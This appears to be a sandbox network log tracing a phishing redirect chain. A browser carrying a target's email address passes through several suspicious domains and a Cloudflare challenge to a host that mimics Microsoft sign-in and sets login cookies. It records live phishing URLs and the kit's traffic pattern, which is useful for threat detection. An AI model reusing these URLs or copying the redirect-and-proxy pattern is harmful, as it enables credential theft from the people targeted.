      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
      Source: global trafficHTTP traffic detected: GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
      Source: global trafficHTTP traffic detected: GET /?mjalaytm&email=john.smith@microsoft.com HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://proposaldocumentsviasecuredport.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://proposaldocumentsviasecuredport.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9261293dee55c468&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs HTTP/1.1Host: rutaann.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /?qrc=john.smith%40microsoft.com HTTP/1.1Host: rutaann.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /?qrc=john.smith%40microsoft.com&sso_reload=true HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
